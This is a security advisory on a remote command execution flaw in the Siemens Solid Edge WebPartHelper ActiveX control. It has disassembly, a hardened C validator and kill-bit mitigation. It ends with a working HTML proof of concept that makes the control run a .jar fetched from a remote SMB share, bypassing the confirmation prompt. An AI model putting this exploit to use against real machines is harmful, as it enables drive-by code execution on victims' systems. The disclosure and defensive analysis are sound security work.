SIEMENS Solid Edge ST4/ST5 WebPartHelper ActiveX Control
RFMSsvs!JShellExecuteEx Remote Command Execution
Tested against: Microsoft Windows Server 2003 R2 SP2
                Microsoft Windows XP SP3
                Microsoft Windows 7
                Internet Explorer 8
Software description: http://en.wikipedia.org/wiki/Solid_Edge
vendor site: http://www.siemens.com/entry/cc/en/
Download url: http://www.plm.automation.siemens.com/en_us/products/velocity/forms/solid-edge-student.cfm
File tested: SolidEdgeV104ENGLISH_32Bit.exe
Background:
The mentioned software installs an ActiveX control with
the following settings:
CLSID: {DD568718-FF20-48EA-973F-0BD5C9FCA522}
Progid: SolidEdge.WebPartHelper.1
Binary Path: C:\Program Files\Solid Edge ST4\Program\WPHelper.dll
Implements IObjectSafety: True
Safe For Initialization (IObjectSafety): False
Safe For Scripting (IObjectSafety): True
This control *implements* IObjectSafety: IE queries it through the IObjectSafety
interface for "Safe for Initialization with data" and "Safe for Scripting".
Through IObjectSafety the control reports itself Safe for Scripting, so IE
will allow scripting of this control according to the browser security
settings (enabled by default for the Internet zone), i.e. any web page may
instantiate it and call its methods. Safe for Scripting is the vendor's
assertion that no exposed method can be abused by a hostile page; the
method below breaks that assertion.
Vulnerability:
The WebPartHelper class exposes the OpenInEditor() method (DISPID 8), see typelib:
...
/* DISPID=8 */
function OpenInEditor(
/* VT_VARIANT [12] [in] */ $URL
)
{
}
...
By passing a path on a null session share (an SMB share reachable without
credentials) as the URL argument of this method, it is possible to launch an
arbitrary executable. The argument is passed, without any validation, from
WPHelper!OpenInEditor to RFMSsvs!JShellExecuteEx, which stores it as the
lpFile member of a SHELLEXECUTEINFOW structure and calls ShellExecuteExW():
whatever the shell can open with that string is started.
Call stack when ShellExecuteExW() is called:
Address  Stack    Procedure / arguments                       Called from          Frame
01B7E140 04AC9F0E SHELL32.ShellExecuteExW                     RFMSsvs.04AC9F08     01B7F280
01B7F284 022B71AD ? <jmp.&RFMSsvs.JShellExecuteEx>            WPHelper.022B71A8    01B7F280
01B7F560 022B85B6 WPHelper.022B6D70                           WPHelper.022B85B1    01B7F55C
01B7F5D4 022B87A5 ? WPHelper.022B8380                         WPHelper.022B87A0    01B7F5D0
01B7F620 022B89CB WPHelper.022B8710                           WPHelper.022B89C6    01B7F61C
01B7F668 7D0E5186 Includes WPHelper.022B89CB                  OLEAUT32.7D0E5184    01B7F664
01B7F690 7D0F4ACF ? OLEAUT32.DispCallFunc                     OLEAUT32.7D0F4ACA    01B7F68C
01B7F720 022B58C3 Includes OLEAUT32.7D0F4ACF                  WPHelper.022B58C1    01B7F71C
01B7F748 40302C02 Includes WPHelper.022B58C3                  jscript.40302BFF     01B7F744
01B7F784 40302B6F jscript.40302B90                            jscript.40302B6A     01B7F780
01B7F7C0 40302AFA jscript.40302B2E                            jscript.40302AF5     01B7F7BC
01B7F834 40303555 ? jscript.40302A88                          jscript.40303550     01B7F830
01B7F878 40301221 jscript.4030122A                            jscript.4030121C     01B7F874
01B7F8B8 403011D6 jscript.403011E1                            jscript.403011D1     01B7F8B4
01B7F8DC 4030312D jscript.40301182                            jscript.40301128     01B7F8D8
WPHelper.dll:
...
022B718A 899D 74FDFFFF       mov dword ptr ss:[ebp-28C],ebx
022B7190 8D85 D8FDFFFF       lea eax,dword ptr ss:[ebp-228]
022B7196 50                  push eax
022B7197 8D8D 60FDFFFF       lea ecx,dword ptr ss:[ebp-2A0]
022B719D 51                  push ecx
022B719E C785 7CFDFFFF 01>   mov dword ptr ss:[ebp-284],1
022B71A8 E8 ADBB0100         call <jmp.&RFMSsvs.JShellExecuteEx>
...
RFMSsvs.dll:
...
04AC9ECF 8B85 A4EFFFFF       mov eax,dword ptr ss:[ebp-105C]
04AC9ED5 8D8D 4CEFFFFF       lea ecx,dword ptr ss:[ebp-10B4]
04AC9EDB 8946 24             mov dword ptr ds:[esi+24],eax
04AC9EDE FF15 0CE3CB04       call dword ptr ds:[<&JUtil.??BGUserText@@QBEPB_WXZ>]  ; JUtil.??BGUserText@@QBEPB_WXZ
04AC9EE4 8946 10             mov dword ptr ds:[esi+10],eax
04AC9EE7 C645 FC 02          mov byte ptr ss:[ebp-4],2
04AC9EEB 8D8D D8EEFFFF       lea ecx,dword ptr ss:[ebp-1128]
04AC9EF1 E8 6A89F1FF         call RFMSsvs.??1JrfmsFileName@@QAE@XZ
04AC9EF6 EB 0F               jmp short RFMSsvs.04AC9F07
04AC9EF8 8D8D 84EFFFFF       lea ecx,dword ptr ss:[ebp-107C]
04AC9EFE FF15 0CE3CB04       call dword ptr ds:[<&JUtil.??BGUserText@@QBEPB_WXZ>]  ; JUtil.??BGUserText@@QBEPB_WXZ
04AC9F04 8946 10             mov dword ptr ds:[esi+10],eax                         ; [esi+10] = SHELLEXECUTEINFOW.lpFile, eax -> "\\192.168.2.100\uncshare\CmdExec.jar"
04AC9F07 56                  push esi                                              ; esi -> SHELLEXECUTEINFOW
04AC9F08 FF15 E8E6CB04       call dword ptr ds:[<&SHELL32.ShellExecuteExW>]        ; SHELL32.ShellExecuteExW
...
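As an added example (not the advisory's PoC and not Siemens' code), the following C shows the pattern the disassembly above exposes, a scriptable method handing its string argument straight to ShellExecuteExW(), next to a hardened form that only admits absolute http/https URLs, so UNC paths, local paths and file: URLs never reach the shell. The function names open_in_editor_unsafe, open_in_editor_safe and is_safe_editor_url are hypothetical and say nothing about WPHelper.dll's real internals; the ShellExecuteExW() call is compiled only on Windows, while the validator is portable and is what the embedded sample inputs exercise.

```c
/*
 * Added example (not the advisory's PoC and not Siemens' code): the pattern
 * behind the bug, a scriptable method passing its argument straight to
 * ShellExecuteExW(), next to a hardened form that admits only absolute
 * http/https URLs, so UNC paths, local paths and file: URLs never reach the
 * shell. Function names are hypothetical; the ShellExecuteExW() call is
 * compiled only on Windows, the validator is portable and is what is tested.
 */
#include <stdbool.h>
#include <stdio.h>
#include <string.h>
#include <wchar.h>
#include <wctype.h>
#ifdef _WIN32
#include <windows.h>
#include <shellapi.h>
#endif

/* Portable case-insensitive "s starts with prefix" for wide strings. */
static bool has_prefix_ci(const wchar_t *s, const wchar_t *prefix)
{
    for (; *prefix != L'\0'; s++, prefix++)
        if (towlower((wint_t)*s) != towlower((wint_t)*prefix))
            return false;               /* also true when s ends early */
    return true;
}

/* Vulnerable pattern: the caller's string becomes lpFile unvalidated, so a
 * UNC path to CmdExec.jar or a local calc.exe is simply launched. */
static bool open_in_editor_unsafe(const wchar_t *url)
{
#ifdef _WIN32
    SHELLEXECUTEINFOW sei;
    memset(&sei, 0, sizeof sei);
    sei.cbSize = sizeof sei;
    sei.lpVerb = L"open";
    sei.lpFile = url;                   /* attacker-controlled */
    sei.nShow  = SW_SHOWNORMAL;
    return ShellExecuteExW(&sei) != FALSE;
#else
    (void)url;
    return false;                       /* nothing to launch off Windows */
#endif
}

/* Hardened check: only absolute http:// or https:// URLs with a non-empty
 * host and no characters the shell could reinterpret. UNC paths, drive
 * letters, relative names, file:, javascript: etc. are rejected up front. */
static bool is_safe_editor_url(const wchar_t *url)
{
    const wchar_t *host, *p;
    if (url == NULL)
        return false;
    if (has_prefix_ci(url, L"https://"))
        host = url + 8;
    else if (has_prefix_ci(url, L"http://"))
        host = url + 7;
    else
        return false;
    if (*host == L'\0' || *host == L'/' || *host == L'\\')
        return false;                   /* empty host, or host starting with a slash */
    for (p = url; *p != L'\0'; p++)
        if (*p == L'\\' || *p == L'"' || *p <= L' ' || *p == 0x7F)
            return false;               /* backslash, quote, space, control */
    return true;
}

/* Same launch, reachable only with a vetted http(s) URL, which ShellExecute
 * routes to the registered http handler (a browser), not to an executable. */
static bool open_in_editor_safe(const wchar_t *url)
{
    return is_safe_editor_url(url) && open_in_editor_unsafe(url);
}

int main(void)
{
    /* constructed samples: the advisory's PoC arguments plus benign URLs */
    static const struct { const wchar_t *url; const char *label; } samples[] = {
        { L"\\\\192.168.0.1\\uncshare\\CmdExec.jar", "UNC .jar (PoC)"      },
        { L"c:\\windows\\system32\\calc.exe",        "local .exe (PoC)"    },
        { L"file:///c:/windows/system32/calc.exe",   "file: URL"           },
        { L"http://example.com/a b",                 "http URL with space" },
        { L"https://plm.example.com/part?id=42",     "plain https URL"     },
    };
    size_t i;
    for (i = 0; i < sizeof samples / sizeof samples[0]; i++)
        printf("%-20s -> %s\n", samples[i].label,
               is_safe_editor_url(samples[i].url) ? "accepted" : "rejected");
    return 0;
}
```

Validating the argument is the developer-side fix; the stronger one is not to expose a shell-launch primitive to script at all, or to stop reporting the control Safe for Scripting. On affected machines the usual administrative workaround for an unsafe ActiveX control is its kill bit: a Compatibility Flags DWORD of 0x400 under HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{DD568718-FF20-48EA-973F-0BD5C9FCA522} (and under the Wow6432Node equivalent for 32-bit IE on 64-bit Windows), which makes IE refuse to instantiate the control regardless of its IObjectSafety answers.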
Proof of concept code follows.
Note that by pointing OpenInEditor() (and consequently ShellExecuteExW())
at a remote .jar file, opened through its JRE/JDK 7u21 file association, it is
possible to bypass the usual confirmation box.
<!--
SIEMENS Solid Edge WebPartHelper ActiveX Control RFMSsvs!JShellExecuteEx
Remote Command Execution PoC
CLSID: {DD568718-FF20-48EA-973F-0BD5C9FCA522}
Progid: SolidEdge.WebPartHelper.1
Binary Path: C:\Program Files\Solid Edge ST4\Program\WPHelper.dll
Implements IObjectSafety: True
Safe For Initialization (IObjectSafety): False
Safe For Scripting (IObjectSafety): True
-->
<!-- saved from url=(0014)about:internet -->
<html>
<script>
// instantiate the control by ProgId; IE allows this because it reports Safe for Scripting
var obj = new ActiveXObject("SolidEdge.WebPartHelper.1");
// launch calc.exe from a local path
//obj.OpenInEditor("c:\\windows\\system32\\calc.exe");
// remote .jar on a null session share: bypasses the confirmation box with JRE/JDK 7u21
obj.OpenInEditor("\\\\192.168.0.1\\uncshare\\CmdExec.jar");
</script>
</html>